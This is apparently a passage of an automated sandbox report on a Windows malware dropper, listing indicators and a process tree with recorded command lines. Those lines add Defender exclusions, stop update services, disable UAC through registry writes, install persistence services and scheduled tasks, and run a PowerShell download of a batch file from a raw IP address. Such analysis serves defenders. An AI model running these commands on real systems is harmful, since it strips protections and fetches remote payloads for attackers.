pid Process 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4012 iexplore.exe 4012 iexplore.exe 1932 IEXPLORE.EXE 1932 IEXPLORE.EXE 1932 IEXPLORE.EXE 1932 IEXPLORE.EXE 4488 RegAsm.exe 2688 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1596 wrote to memory of 2360 1596 4363463463464363463463463.exe 29 PID 1596 wrote to memory of 2360 1596 4363463463464363463463463.exe 29 PID 1596 wrote to memory of 2360 1596 4363463463464363463463463.exe 29 PID 1596 wrote to memory of 2360 1596 4363463463464363463463463.exe 29 PID 1596 wrote to memory of 1924 1596 4363463463464363463463463.exe 30 PID 1596 wrote to memory of 1924 1596 4363463463464363463463463.exe 30 PID 1596 wrote to memory of 1924 1596 4363463463464363463463463.exe 30 PID 1596 wrote to memory of 1924 1596 4363463463464363463463463.exe 30 PID 1596 wrote to memory of 1236 1596 4363463463464363463463463.exe 31 PID 1596 wrote to memory of 1236 1596 4363463463464363463463463.exe 31 PID 1596 wrote to memory of 1236 1596 4363463463464363463463463.exe 31 PID 1596 wrote to memory of 1236 1596 4363463463464363463463463.exe 31 PID 2360 wrote to memory of 820 2360 tdrpload.exe 32 PID 2360 wrote to memory of 820 2360 tdrpload.exe 32 PID 2360 wrote to memory of 820 2360 tdrpload.exe 32 PID 2360 wrote to memory of 820 2360 tdrpload.exe 32 PID 1596 wrote to memory of 1904 1596 4363463463464363463463463.exe 33 PID 1596 wrote to memory of 1904 1596 4363463463464363463463463.exe 33 PID 1596 wrote to memory of 1904 1596 4363463463464363463463463.exe 33 PID 1596 wrote to memory of 1904 1596 4363463463464363463463463.exe 33 PID 1596 wrote to memory of 2344 1596 4363463463464363463463463.exe 34 PID 1596 wrote to memory of 2344 1596 4363463463464363463463463.exe 34 PID 1596 wrote to memory of 2344 1596 4363463463464363463463463.exe 34 PID 1596 wrote to memory of 2344 1596 4363463463464363463463463.exe 34 PID 1596 wrote to memory of 3144 1596 4363463463464363463463463.exe 35 PID 1596 wrote to memory of 3144 1596 4363463463464363463463463.exe 35 PID 1596 wrote to memory of 3144 1596 4363463463464363463463463.exe 35 PID 1596 wrote to memory of 3144 1596 4363463463464363463463463.exe 35 PID 820 wrote to memory of 4892 820 sysppvrdnvs.exe 36 PID 820 wrote to memory of 4892 820 sysppvrdnvs.exe 36 PID 820 wrote to memory of 4892 820 sysppvrdnvs.exe 36 PID 820 wrote to memory of 4892 820 sysppvrdnvs.exe 36 PID 820 wrote to memory of 4900 820 sysppvrdnvs.exe 37 PID 820 wrote to memory of 4900 820 sysppvrdnvs.exe 37 PID 820 wrote to memory of 4900 820 sysppvrdnvs.exe 37 PID 820 wrote to memory of 4900 820 sysppvrdnvs.exe 37 PID 4900 wrote to memory of 5036 4900 cmd.exe 40 PID 4900 wrote to memory of 5036 4900 cmd.exe 40 PID 4900 wrote to memory of 5036 4900 cmd.exe 40 PID 4900 wrote to memory of 5036 4900 cmd.exe 40 PID 4892 wrote to memory of 5052 4892 cmd.exe 41 PID 4892 wrote to memory of 5052 4892 cmd.exe 41 PID 4892 wrote to memory of 5052 4892 cmd.exe 41 PID 4892 wrote to memory of 5052 4892 cmd.exe 41 PID 3144 wrote to memory of 5108 3144 clr.exe 42 PID 3144 wrote to memory of 5108 3144 clr.exe 42 PID 3144 wrote to memory of 5108 3144 clr.exe 42 PID 3144 wrote to memory of 5108 3144 clr.exe 42 PID 5108 wrote to memory of 3244 5108 cmd.exe 44 PID 5108 wrote to memory of 3244 5108 cmd.exe 44 PID 5108 wrote to memory of 3244 5108 cmd.exe 44 PID 5108 wrote to memory of 3244 5108 cmd.exe 44 PID 4900 wrote to memory of 3256 4900 cmd.exe 45 PID 4900 wrote to memory of 3256 4900 cmd.exe 45 PID 4900 wrote to memory of 3256 4900 cmd.exe 45 PID 4900 wrote to memory of 3256 4900 cmd.exe 45 PID 4900 wrote to memory of 3276 4900 cmd.exe 46 PID 4900 wrote to memory of 3276 4900 cmd.exe 46 PID 4900 wrote to memory of 3276 4900 cmd.exe 46 PID 4900 wrote to memory of 3276 4900 cmd.exe 46 PID 4900 wrote to memory of 3292 4900 cmd.exe 47 PID 4900 wrote to memory of 3292 4900 cmd.exe 47 PID 4900 wrote to memory of 3292 4900 cmd.exe 47 PID 4900 wrote to memory of 3292 4900 cmd.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4044 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:5036
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3256
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3276
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:3292
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\368923376.exeC:\Users\Admin\AppData\Local\Temp\368923376.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\23732637.exeC:\Users\Admin\AppData\Local\Temp\23732637.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992 -
C:\ProgramData\5C82.tmp"C:\ProgramData\5C82.tmp"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\5C82.tmp >> NUL8⤵PID:1480
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 8166⤵
- Loads dropped DLL
- Program crash
PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1513115570.exeC:\Users\Admin\AppData\Local\Temp\1513115570.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:3876
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:1944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1540
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:2156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44286951.exeC:\Users\Admin\AppData\Local\Temp\44286951.exe5⤵
- Executes dropped EXE
PID:2076
-
-
C:\Users\Admin\AppData\Local\Temp\773631861.exeC:\Users\Admin\AppData\Local\Temp\773631861.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\3721125312.exeC:\Users\Admin\AppData\Local\Temp\3721125312.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4616
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe"C:\Users\Admin\AppData\Local\Temp\Files\Vhpcde.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1236 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\1138210337.exeC:\Users\Admin\AppData\Local\Temp\1138210337.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2536 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: SetClipboardViewer
PID:4164 -
C:\Users\Admin\AppData\Local\Temp\1199625863.exeC:\Users\Admin\AppData\Local\Temp\1199625863.exe6⤵
- Executes dropped EXE
PID:4088
-
-
C:\Users\Admin\AppData\Local\Temp\2002914642.exeC:\Users\Admin\AppData\Local\Temp\2002914642.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:1876
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:2964
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:1968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\303212763.exeC:\Users\Admin\AppData\Local\Temp\303212763.exe6⤵
- Executes dropped EXE
PID:5104
-
-
C:\Users\Admin\AppData\Local\Temp\558624310.exeC:\Users\Admin\AppData\Local\Temp\558624310.exe6⤵
- Executes dropped EXE
PID:3108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\clr.exe"C:\Users\Admin\AppData\Local\Temp\Files\clr.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\clrinst.bat" "4⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im miter.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\instsrv.exeinstsrv.exe alark C:\Windows\alark.exe5⤵
- Executes dropped EXE
PID:3516
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3624
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Description" /t REG_SZ /d "Alarm service for default browser." /f5⤵
- System Location Discovery: System Language Discovery
PID:3852
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "DisplayName" /t REG_SZ /d "Alarm Key Service" /f5⤵PID:3872
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f5⤵
- System Location Discovery: System Language Discovery
PID:3920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Start" /t REG_DWORD /d "2" /f5⤵
- System Location Discovery: System Language Discovery
PID:3948
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Type" /t REG_DWORD /d "16" /f5⤵
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ErrorControl" /t REG_DWORD /d "1" /f5⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\alark.exe" /f5⤵
- Sets service image path in registry
PID:3996
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SYSTEM\CurrentControlSet\services\alark\Parameters" /v "Application" /t REG_SZ /d "cmd /c start C:\Windows\miter.exe -t3010 C:\Windows\sysclr.bat" /f5⤵
- System Location Discovery: System Language Discovery
PID:4016
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 25⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4036
-
-
C:\Windows\SysWOW64\net.exenet start alark5⤵PID:1840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start alark6⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 45⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4228
-
-
C:\Windows\SysWOW64\timeout.exetimeout 4 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im alark.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1648 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\explorer.exeexplorer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"3⤵
- Executes dropped EXE
PID:4272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:3880 -
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:4852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵
- System Location Discovery: System Language Discovery
PID:4620 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1192
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:480
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\2615611998.exeC:\Users\Admin\AppData\Local\Temp\2615611998.exe5⤵
- Executes dropped EXE
PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\184854346.exeC:\Users\Admin\AppData\Local\Temp\184854346.exe5⤵
- Executes dropped EXE
PID:4712 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:1732
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:992
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:4672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2434428799.exeC:\Users\Admin\AppData\Local\Temp\2434428799.exe5⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\853921094.exeC:\Users\Admin\AppData\Local\Temp\853921094.exe5⤵
- Executes dropped EXE
PID:2656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4135.tmp\4136.tmp\4137.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"4⤵PID:1124
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
PID:4180 -
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target6⤵
- Executes dropped EXE
PID:4988 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4386.tmp\4387.tmp\4388.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"7⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:2596
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:4452
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:3460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"8⤵PID:3668
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command9⤵PID:3700
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/8⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4012 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4012 CREDAT:275457 /prefetch:29⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1932
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:2660
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\219214699.exeC:\Users\Admin\AppData\Local\Temp\219214699.exe5⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\81767200.exeC:\Users\Admin\AppData\Local\Temp\81767200.exe5⤵
- Executes dropped EXE
PID:2596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:4224
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:2992
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:3672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3308631091.exeC:\Users\Admin\AppData\Local\Temp\3308631091.exe5⤵
- Executes dropped EXE
PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\2784122165.exeC:\Users\Admin\AppData\Local\Temp\2784122165.exe5⤵
- Executes dropped EXE
PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\1395528265.exeC:\Users\Admin\AppData\Local\Temp\1395528265.exe5⤵PID:4404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:5052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:696
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:2696
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5080
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:1820
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\3004616838.exeC:\Users\Admin\AppData\Local\Temp\3004616838.exe5⤵
- Executes dropped EXE
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\329988372.exeC:\Users\Admin\AppData\Local\Temp\329988372.exe5⤵
- Executes dropped EXE
PID:2700 -
